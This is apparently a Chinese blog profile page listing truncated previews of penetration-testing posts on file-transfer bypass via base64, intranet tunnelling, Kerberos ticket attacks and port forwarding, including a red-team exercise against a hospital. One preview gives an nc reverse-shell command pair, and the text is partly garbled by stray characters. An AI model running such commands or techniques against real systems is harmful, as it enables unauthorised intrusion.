1焚挠、前言 有次發(fā)現(xiàn)這樣的一個(gè)情況,目標(biāo)云桌面不出網(wǎng)且不允許上傳文件但是可以復(fù)制文本楞件,于是便想著通過(guò) PowerShell 將 exe 程序編碼成 base64 文本,將編碼后...
![240](https://upload.jianshu.io/users/upload_avatars/22612543/135e59bb-1d4e-4757-b789-edcd99df5076.jpg?imageMogr2/auto-orient/strip|imageView2/1/w/240/h/240)
IP屬地:黑龍江
1焚挠、前言 有次發(fā)現(xiàn)這樣的一個(gè)情況,目標(biāo)云桌面不出網(wǎng)且不允許上傳文件但是可以復(fù)制文本楞件,于是便想著通過(guò) PowerShell 將 exe 程序編碼成 base64 文本,將編碼后...
一坯约、使用proxy實(shí)現(xiàn)內(nèi)網(wǎng)穿透 準(zhǔn)備 教程參考地址:https://snail007.github.io/goproxy/manual/zh/#/[https://snail...
票據(jù)傳遞攻擊 這里介紹域內(nèi)常用的兩種攻擊方式:黃金票據(jù)Golden ticket阱高、白銀票據(jù)SILVER TICKET 另外,學(xué)習(xí)過(guò)Kerberos認(rèn)證過(guò)程的同學(xué)會(huì)更加容易的理...
https://github.com/StudioEtrange/socat-windows
內(nèi)網(wǎng)滲透之端口轉(zhuǎn)發(fā)網(wǎng)絡(luò)拓?fù)鋱D如下: 1茬缩、nc 1.1 反向連接 攻擊機(jī):nc -lvp port 靶機(jī)(windows):nc.exe -e cmd rhost rport 成功反彈shell...
前言 記錄之前參加演練的一次實(shí)戰(zhàn)過(guò)程寒屯。 演練目標(biāo) 拿下某醫(yī)院核心his權(quán)限 web打點(diǎn) 拿到目標(biāo)荐捻,通過(guò)信息收集盡可能多的尋找目標(biāo)資產(chǎn),最終發(fā)現(xiàn)了存在漏洞的某系統(tǒng)寡夹,通過(guò)該系統(tǒng)進(jìn)...